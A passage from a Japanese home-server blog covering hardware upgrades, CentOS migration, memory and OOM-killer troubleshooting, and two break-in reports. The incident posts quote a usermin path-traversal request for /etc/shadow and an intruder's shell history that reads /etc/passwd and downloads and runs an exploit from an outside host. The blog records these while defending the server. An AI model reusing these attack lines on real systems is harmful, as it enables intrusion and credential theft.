smilemark blog :-)

●SC440見送り

現在稼働しているサーバ(SC430)の置き換えに発注しようと思ってたんですが、思いとどまりました。
CPUがPentium Dual-Core E2180やCore2 Duo E4500（4,200円アップ）では、Intel VT(Virtualization Technology)対応じゃないんですね。Xenで仮想化して、Windowsなんかも一緒に動かせるようにすると、何かと便利なこともあるかと思っていたんですが。
さらに上のグレードのXeon 3050を選択すれば可能ですが、26,250円もアップして構成価格が46,050円になってしまいます。そこまでしてXenを動かしたい目的があるわけでもないので、せっかくのDell祭りですが、今回は見送ることにしました。

●Dell PowerEdge SC440 19,800円

おぉぉぉ、Dell PowerEdge SC440、Intel Pentium Dual-Core E2180（2GHz, 1MB L2 Cache, 800MHz FSB）、512MB (1x512MB) DDR2/667MHz SDRAM、80GB 7200回転 SATA II 3.5" HDD、16倍速 IDE DVD-ROM ドライブでイチキュッパ19,800円ですよ。800台限定ですっ！ 自宅サーバ用にぴったりですよ。

●DD-WRT

少し前に自宅無線LAN環境をFoneraに統合したけど、Foneraはいろいろイケてない問題があります。

Coregaのネットワークカメラの無線LANがつながらない
WPA TKIPでの接続はCoregaのネットカメラで問題なく接続できるはずなんだけど、うまくつながらない。いろいろネットで調べてると、Coregaの無線LANカードでFoneraとつながらないといった事例が報告されてたりする。何か無線LANの相性問題でもあるんだろうか。

ブリッジ設定できない
NATがかんでしまうので、有線LAN側から無線LAN機器へのセッションが張れない。たとえば、有線LAN側から、上記のネットワークカメラとかにアクセスできないです。AirTunesも有線LANと無線LANをまたぐことができなくなります。

こんな感じでいろいろ不都合があるので、BUFFALO WBR-G54復活です。ただ復活させるのでは面白くないので、この古くてサポートも切れたルータにDD-WRTをインストールしてみました。DD-WRTはオープンな代替ファームウェアで、ルータ、無線LAN機能の強力な強化を行えます。

インストールにあたっては、この方のページを参考にさせていただきました。
[DD-WRT] Buffalo WBR-G54

機能強化はしてみたものの、ただの無線LANベースステーションとしてしか使わないので、この強力な機能アップはほとんど意味のないものなんですが、こんな古い機種でも機能強化を図れるというのは嬉しいですね。

●無線LAN環境

Foneraを自宅に設置した当初、プライベートSSIDにMacやWindowsノートPC（本当に古いThinkPad 240）がうまく繋がらなかった。MacからはSSIDを見つけられず、Windowsノートでは接続してもすぐに切れてしまって使い物にならなかった。仕方ないので、それまで使っていたBuffalo WBR-G54を使い続けてきた。

ところが先日、FoneraのプライベートSSIDにこれらがうまく繋がることに気づいた。ファームウェアがアップデート（自動）されたせいだろうか、、、
ここ数日問題なく使用できているので、Buffalo WBR-G54の無線LANを無効にした。撤去しても良いのだけれど、ハブとしても使っているのでとりあえずはそのままに。

写真は、光モデム（NTT西日本）、ギガビットスイッチングハブ（Buffalo LSW-GT-5NS）、ルータ（Yamaha RTX1100）、Fonera。

●バックアップHDDをサーバに内蔵

バックアップ用のHDDをサーバに内蔵した。赤枠で示したのが今回内蔵したHDD。3.5インチベイが2つ余っているので、そこに取り付けた。エアフローが悪そうなので、夏場は心配かも。

DELL SC430のベイへの取り付けには注意が必要。取り付けるユニットの左側に専用のネジ（ネジのツバがユニットから浮くようになっている）を取り付けてベイにスライドするようになっているが、このネジがミリネジなのでHDDのようにインチネジだとネジ山が合わない。インチネジにミリネジだと少々ゆるいけど、支障なさそうだったのでそのまま取り付けた。

一番下の2基のHDDはRAID1（ミラーリング）で運用しているメインのHDD。こちらは、すぐ左側（フロント）にファンがあるので夏場でも温度は安全圏です。

●バックアップ用のHDDを交換

サーバのバックアップに160GBのUSB HDDを使っていたが容量不足になってしまったので、サーバのHDDと同じサイズ(320GB)のHDDを新たに購入した。サーバに内蔵しているものと同じHGSTのHDT725032VLA360を購入。
箱がないのでとりあえず裸のままSATA-USB変換を使って接続。今度はUSBを使わずにe-SATAで直接接続しようと思う。e-SATAのHDDケースを探索中。

●TB SPAMによる高負荷とメモリ消費

apacheのスレッドがドドドっと立ち上がってCPU負荷が思いっきり上がると同時に、メモリも大きく消費されるのが見て取れる。ログは確認していないがMTへのトラックバックSPAMだと思われる。
メモリが一気に500MBくらい消費されている。この倍の規模だと、以前ならoom killerが発生してしまっていることになる。
尋常ではない負荷なので、apacheのチューニングを行ったほうが良さそう。

●cactiにapache監視を追加

Software Design10月号は『ネットワーク＆システムの「見える化」計画』特集でした。うちのサーバでも監視に用いているcactiの紹介や応用も掲載されています。いくつかのプロバイダでの実際のシステム構成や監視の実態の紹介など興味深い内容でした。
記事を参考にapacheの監視をcactiに追加しました。

●MT4.01アップデート

MTを4.01にアップデートしました。たくさんのバグフィックスがあるようです。アップデートの必要性は「強く推奨」だそうです。
確かに使ってて「あれ？」と思うことがありました。これで直ってると良いですが。

●メモリ増設

オーダーしていたメモリ到着。早速インストール。
512Mから2.5GBへの大幅増強。これで大きなSWAPの発生による高負荷や、メモリ不足によるoom killerを抑えられる見込み。
しかし1万9千円のサーバに、増設メモリが16,500円、、、、

筐体を開いたついでに内部のホコリを掃除して、ネットカメラに移行して使わなくなったビデオキャプチャカードを取り外した。

●サーバ用のメモリをオーダー

このところメモリの使用量を見ていて度々swapも512MB以上使ってしまうことがあるのを見かけた。その都度負荷は大きく跳ね上がり、HDDの温度も上昇する。
MTへのトラックバックSPAMはapacheのチューン次第だと思うが、他にも原因があるかもしれないし、何よりメモリ512MBでは心もとない気がしてきたので増設することにした。

2GB増設して2.5GBにすることにします。そこでTranscend TS1GDL370(1GB)を2枚オーダーしました。

ECC付きメモリは高価ですが、だいぶ値もこなれてきた感があります。このメモリ、Transcend オンラインで8,250円です。他のショップでは、このメモリがまだ1万円以上してたりします。ヤフオクでもこれより高値で取引されているのを見かけます。値段の動きが追従してないんですね。

●Coppermine Photo Galleryインストール

以前サーバがクラッシュしたときに写真を公開するのに使っていたCoppermine Photo Galleryもクラッシュしてしまい、ずっとそのままにしていた。一時は気分を変えてFlickrにしてみようとも思ったんだけど、もう一度Coppermine Photo Galleryをインストールすることにしてみました。

●超高負荷

サーバの状態を確認すると、すごい負荷が掛かってHDDの温度も上昇しているのを見つけた。記憶領域のグラフは、高負荷のせいか途切れてしまっていた。

apacheのログを調べて回ると、MovableTypeのトラックバックCGIが該当する時間帯に多量に立ち上がっていることが分かった。どうやらトラックバックSPAMが原因のようだ。現在は一時的にSWAPを増やしているので何とか凌げているが、以前ならoom killerが発動していたことだろう。

対策としてapacheのチューニングを行おうと思う。具体的には、RLimitCPU、RLimitMem、RLimitNPROCをうまく設定する必要がある。

●RAID Rebuilding

なんと今朝の強制再起動からRAIDがDegrade状態になっている。強制的に電源落としたのがいけなかったんだろうか、、、
とりあえずシステムのバックアップをとって、リビルド中。
ちなみに、このHDDは今年の2月に交換したばかり。まだ壊れないで欲しい。

●oom killer度々

今朝もoom killerが発生。ちょうどタイミングに出くわしたが、すごい負荷でログインできずに、何がメモリを食ってるのか分からず終いだった。結局いろんなプロセスが殺されてしまったせいか、ログインすらできなくなってしまったので強制再起動させた。

ログを見てもなかなか原因を特定できそうにないので、とりあえずどの程度メモリが増えればoom killerが発生しないのか試すことにした。メモリを増設するのはコストもかかるし面倒なので、とりあえずswapを1GB増やして様子をみることにした。

ファイル上にスワップ領域を作る方法は以下の通り。

# dd if=/dev/zero of=/usr/local/swap bs=1024 count=1073741824
# chmod 600 /usr/local/swap
# mkswap /usr/local/swap 1073741824
# swapon /usr/local/swap

●oom killer問題

1〜2ヶ月に1度程度、サーバが止まってしまう事がある。原因はメモリ不足によるoom killer(Out of Memory Killer)の発動のせい。oom killerはメモリが確保できるようになるまで、稼働しているプロセスを（無作為に?）殺して回るために、いろんなサービスが停止してしまう。（そもそも、こんな仕組みで問題ないんだろうか、、、）
httpdなんかが止まればすぐに気づくが、telnetdやftpdが止まってもしばらく気がつかない事もある。毎朝logwatchメールには目を通してるんだけど、oom killerはなぜかレポートに含まれてこない。

何が原因でメモリ不足が発生するのか原因は未だ分かっていないので対策できないでいる。たぶんapache関係だと思うんだけど。（MTへのTBアタックとか）
何も考えずにメモリを増やす（現在512MB）という手もあるけど、ECC付きのメモリは高価だし、そもそも定常状態では512MBで十分なので安易にメモリ拡張するのもなんだかなぁ。

# free
                   total     used      free  shared  buffers cached
Mem:       514508 457212   57296          0   18420 114176
-/+ buffers/cache:  324616 189892
Swap:      506036       360 505676

定常的には約190MBもメモリに余裕がある。

とりあえずlogwatchにoom killerのメッセージが出るようにして、早めに対応できるようにしたいと思います。

●RTX1100 SNMP

以前、取説をさらっと見ただけで、ルータYAMAHA RTX1100はSNMPでインタフェースの情報を取れないものだと思い込んでた。もう一度調べ直してみると取得できるじゃないですか。

設定にあたっては、以下のドキュメントが参考になります。
http://www.rtpro.yamaha.co.jp/RT/FAQ/SNMP/index.html

PPPoEで使っているPPポートをSNMPで見れるようにするにはsnmp yrifppdisplayatmib2 onコマンドで有効にしなければならない。

snmp host XXX.XXX.XXX.XXX
snmp community read-only PUBLIC
snmp yrifppdisplayatmib2 on

さっそくcactiに設定して、トラフィックをモニタできるようにしました。これでWANの通信状況もモニタできるようになりました。

●夏のHDD

この一週間のサーバのHDDの温度変化です。部屋に誰もいないときは冷房はつけていないのですが、HDDは50℃を越えることはないようです。だいたい室温＋10℃って感じです。これなら大丈夫そう。

●MT4へアップデート

MTを3.3から4.0へアップデートした。久々のメジャーバージョンアップ。
小粋空間さんの記事を参考に移行完了。以前使っていたプラグイン関係のタグを削除したりして少々手間取ったけど無事完了。

Blog以外のウェブページが作れるCMSのような機能と、WYSIWYG編集が便利そうなのでアップデートに踏み切りました。

アップデート後、MTのDashboardが日本語表示されない。アップデート手順に不備があったのか、、、。他にも、ファイルのアップロード画面からキャンセルで抜けられなくなかったり（WindowsのFirefoxだけか?）、少々問題点がある。原因は不明。

その後、Dashboardの表示は、User Profileを保存しなおすことで（User Profile画面で保存を行う事で）無事日本語表示になりました。

●up2dateでハマる

久々にサーバのup2dateを掛けたところ、GDM（グラフィカルログイン）画面のバックグラウンドのpngファイルのフォーマットを読み込めないというエラーでコンソールからログインできなくなってしまった。
調べてみると、GTK+の設定ファイルgdk-pixbuf.loadersにpngフォーマットのエントリがないことが分かった。原因はlibpngとの整合性のようであった。最新のlibpngを持ってきてmake installして、gdk-pixbuf-query-loaders-32でgdk-pixbuf.loadersを作成し直すとpngファイルのエントリが追加されて、正しくGDMやX-windowによるコンソール画面が起動するようになった。
他にもImageMagickとPerlMagickのアップデートによって、正しくjpegのハンドリングをできなくなる事態になっていた。libjpegをソースからビルドしてインストールし、ImageMagickおよびPerlMagickもソースからビルドしてインストールすることで解決。
ソースから入れ直したモジュールは、yumとかup2dateにデグレードされないようにアップデートの対象外にしたいけど、どうすればいいんだろう。

●ネットワークカメラ導入

留守番中のわんこの様子を見るためのカメラをネットワーク（無線LAN）カメラCorega CG-WLNCMNGV2に変えました。
こんなのが1万円台で買えるんですからすごい時代ですよね。

Camera: CANON EOS 20D + CANON EF-S 10-22mm F3.5-4.5

これまで使ってたカメラはこんなの（以下）です。画像を送信するワイヤレスカメラと専用の受信機のセットになっています。6年位前にUSで$70くらいで買ったような気がします。
2.4GHz帯を使用していますが無線LANじゃないです。画像（と音声）はアナログで送信されます。

Camera: CANON EOS 20D + CANON EF-S 10-22mm F3.5-4.5

専用の受信機からのビデオ出力を、サーバに内蔵させたビデオキャプチャカードで取り込んでネットワークカメラの機能を実現させていましたが、サーバを入れ替えてから再設定が面倒なんでそのままになっていました。構成がスマートで設定も簡単なネットワークカメラに入れ替えることにしました。

ネットワークカメラへはWAN側からは直接アクセスできないようにしています。自宅サーバ上の専用ウェブページから見れるようにCGI（ネットワークカメラの画像をwgetしてるだけです）で処理しています。

まぁ、留守番の様子見ても寝てるだけなんですけど。^^;;

●サーバリニューアル

先月インストールしてそのままになっていたサーバのアップデートを行った。
古いPCを使って、CentOS4.4のインストールと設定、コンテンツのコピーを終えたHDDを、本来のサーバに載せ換えた。
セキュリティにかかわる設定を終えて、いろんな機能もざっとチェックした。まだ足りないものもあるが、これから追々インストールと設定を行っていく。

今回のOS変更で、すでにほとんどいっぱいだった160GBのHDDを300GBに変更した。これでしばらく持ちそうだ。

Dell SC430サーバの中身。300GB x 2のRAID 1構成です。

●OP25B対策完了

ということで、自宅サーバのOP25B対策を行いました。
メールサーバはさくらインターネットと契約しているので、自宅サーバからのメール発信はさくらインターネットのメールサーバをリレーさせるように設定。Submission Portを介してSMTP認証で接続するようにsendmailを設定します。自宅サーバからさくらインターネット間はSMTP over SSLで接続しています。

自宅サーバ ---SMTP over SSL / Submission Port---> さくら

これで無事に今まで通り自宅サーバからのメール発信も行えるようになりました。

設定は以下のページが参考になります。
「OP25B環境下における非常駐sendmail用submit.mcの設定方法」

●Outbound Port25 Blocking

使っているプロバイダ(BB.excite)でもOutbound Port25 Blockingが始まってしまった。プロバイダ外のメールサーバを使っているので、メールが出せなくなってしまった。PCのメール環境ではSMTPをメールサーバのSubmission Portに変更すれば良いので困らないが、自宅サーバのMTA(sendmail)からプロバイダ外にメールが発信できなくなってしまった。いくつかのMLや管理用メール発信が滞ってしまう。sendmailから直接発信じゃなくて、メールサーバのSubmission Portへリレーさせるようにしなくては。SMTP-AUTHなんかも設定も必要なので面倒だなぁ。

●userminから侵入

なんとまた侵入されていた。orz
あるユーザからFTPが繋がらないと連絡を受けて、いろいろ調べてみると侵入者によってパスワードが変更されていた。以前sshで侵入されたが、それとは別の侵入路だった。なんとuserminから侵入されていた。
調べてみるとuserminの古いバージョンには脆弱性が報告されている。

userminのログを確認すると、例のsshの対策（sshサービスを停止）を施したわずか2日後にuserminから侵入してきていた。ログによると、userminの脆弱性を利用して/etc/shadowを得ることができたようだ。
＃アクセス元のIPはあえて隠しません。

62.204.144.14 - - [26/Jan/2007:11:07:09 +0900] "GET /unauthenticated//..%01/....省略.....%0/etc/shadow HTTP/1.1" 200 1966

このあと8時間後にuserminから複数のアカウントにログインしてきている。ログインしたアカウントはすべてパスワードを変更して回っている。（ほとんど使われていないアカウントが含まれているので、ユーザから報告を受けるまで気づかなかった。）
アカウントのうち1つは、そのユーザ権限で何やらデーモンが動かされていた。shという名前で動いていて、そのユーザのホームの下に作られた.bashというフォルダに実体があった。何やら1時間に一度ファイルが更新されている。このデーモンは今日まで何を行っていたんだろう、、、、、

今回usermin経由で侵入してきたのは、全アカウントにではない。おそらく暗号化されたパスワードを、パスクラック（辞書に載ってるような単語などを暗号化したものと比較してパスワードを見破る手法）して破ることができたものだけが侵入されたのだろう。何はともあれ、またパスワードの再設定を行わなければ。

対策として、この脆弱性の対策が施されたuserminとwebminに更新した。またuserminから行える項目も見直して、ファイルの転送やshellの実行などは行えないようにした。

webminはアクセスの形跡がなかった。まだ今のところroot権限は奪われていない。目的とすることは、ホストの乗っ取りではなくて、アタックのための踏み台だろうから、おそらくはroot権限など要らないんだろう。彼らにとっては、アタックに必要なデーモンが実行できて、なるべく長く見つからないことが重要なんだろう。それには逆に、パスワードなど変更しないほうが見つかりにくいと思うんだけど。今回の場合、鍵を掛けてしまうから侵入に気づかれているわけだし。

インターネットに晒されているサーバの維持管理は本当に難しい。とにかくシステムのログとJPCERT/CCのレポートにはしっかり目を通さないと。
しかしイタチごっこですね。

●CentOS4.4インストール中

以前サーバにしていたPC(Celeron 1.3GHz)に、昨夜届いたHDDと、先日ヤフオクで購入した3ware 8006-2LPをインストール。こういう時、古いPCでも一台くらい予備に置いておくと何かと役に立ちます。
さっそくCentOS4.4のインストール開始する。まずはOSのインストールとup2dateまで行って、コンテンツ（ウェブやデータベースなど）の移行はのんびりやっていこうと思っています。

CentOS4.4のインストールについては何も難しいことはないですが、以下が参考になります。
「インストール完全ガイド　CentOS 4.4」

●中部電力コミュファ

去年末から中部電力のコミュファのサービスエリアになったようだ。月額料金が、プロバイダ込みで5,985円、プロバイダ別で3,990円。
現在、NTT西日本Bフレッツ月額5,219円＋プロバイダ(BB.excite)月額500円だ。
コミュファの場合、提携プロバイダが少ないし、その中にはBB.exciteのような格安のプロバイダはないようだ。（BB.excteの500円プラン。メールやウェブなどのサービスは一切要らない人向けのプラン。）
どうやら私にとって、コミュファにメリットはなさそうだ。

●320GB SATA HDD購入

新しいサーバ構築用に320GB SATA HDDを2台購入。モノは日立IBM(HGST)のHDT725032VLA360。ドスパラで1台10,479円でした。

●3ware 8006-2LPを購入

新しいOS(CentOS)のインストール用に、現在サーバで使っているのと同じRAIDカード3ware 8006-2LPの中古をヤフオクで13,000円でゲット。新品だと2万円くらいします。
とりあえず空いてるPCに載せて、余っているSATAのHDDを1つだけ繋いで、KNOPPIXでパーティショニングとフォーマットを行って動作確認。問題なし。

RAID1（ミラー）なら、素のSATAインタフェースにHDDを繋いでサーバを構築後、元のサーバのRAIDカード(8006-2LP)に繋げばいいじゃん、と思われがちですが、実はこれができないんです。3wareのRAIDって、ディスクの情報（パーテショニングなど）を特殊な持ち方してるようです。

さて次はHDDの用意だ。

●サーバのバックアップ方法を変更

前回から1ヶ月強のバックアップ。
今までデータの領域はtarでパイプして毎回丸ごとコピーしていたけど、今回からrsyncで差分だけをコピーすることにした。できれば毎晩バックアップを取るように変更しようかと思っている。

●Fedora Legacy shutting down

去年末でFedora Legacy Projectがとうとう終わってしまった。RedHat9のサポートが打ち切られた2004年5月から今まで、このプロジェクトのおかげで自宅サーバのセキュリティを維持できてきました。Thanks, Fedora Legacy Project!

このままではセキュリティの維持が行いにくい（Security Issue発生時になるべく手間をかけずにすばやく対応したい）ので、この際何らかのディストリビューションに乗り換えるのが懸命だろう。
ここはやはり以前も検討したCentOS(4.4)にしてみようかと思っている。RHEL4互換のOSだ。RedHat系なので手馴れているし、アップデートも簡単だし、ライフタイムもRHEL4と同じだとすれば2012年2月29日まで受けられる。

ディストリビューション変更の手順としては、ダウンタイムを短くして、リスクも最小限に行いたい。OSのセットアップに時間をかけたいので、以下の方法が良さそう。

別のPC上でCentOSでサーバを構築
↓
コンテンツやデータベースを移動してチェック
↓
元のサーバにHDDを換装

以前使っていたPCが空いているのでサーバは問題ない。しかし別途RAIDとHDDを用意しないとならない。RAIDは現在も使っていて実績もある3ware 8006-2LPが良いだろう。HDDはもそろそろ容量アップ（160GB→300GB程度）もしたかったのでちょうど良い。

●再び侵入されたorz

今度は違うアカウントで侵入してきた。orz
以前と同じようにsshで、さも知ってるアカウントのようにログインしてきた。26分間も居座っている。その場で気づいたらtalk掛けてみたいものだ。

ac805068.ipt.aol.com Tue Jan 23 05:30 - 05:56 (00:26)

このユーザのパスワードを再発行して、パスワードの変更のお願いを出さないとならない。

今回は、ホームディレクトリを持つユーザだったのでshellのヒストリファイルに実行したコマンドの履歴が残っていた。

ls
cd
ls
cd public_html/
ls
emacs index.html
ls -laF
emacs index.html
uname -a
ls -a
cd log
ls -a
cat /etc/passwd
wget geocities.com/paul981ro/a-exploit.tar.gz
uname -r
cat /etc/issue
chmod +x a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
exit

ウェブページのコンテンツフォルダに入ってindex.htmlをemacsで開いているが、タイムスタンプは変わっていないので改ざんしてないようだ。
その後ウェブのアクセスログが収められているlogフォルダに移動している。
パスワードファイルを眺めた。おそらく新しいアカウント情報を得るためだろう。
ウェブからa-exploit.tar.gzをローカルにコピーした。
実行属性を立てて実行した。

調べてみるとa-exploit.tar.gzという名前のプロセスが動いているではないですか。即座にkillする。
exploitという名前から察するに、セキュリティホールを利用したアタックを掛けるもののようだ。
ネットワークトラフィックを見たところ、目視した感じでは目立ったトラフィックの増大はないようだ。どこかに迷惑をかけてなければ良いけど。

また、maillogには、このアカウントユーザからyouareinusa@gmail.com宛にメールが発信されていたログが残っていた。おそらく起動されていたプロセスが発信したのだろう。
しかし、間抜けな事にyouareinusa@gmail.comはUser Unknownで、エラーメールがこのアカウント宛に戻ってきていた。ちなみにこのアカウントのメールは使用されていない。
エラーで戻ってきたメールの内容を見ると、メールにはpasswdファイル、hostsファイル、www.yahoo-ht2.akadns.netへのpingの結果、uname -aの結果が収めら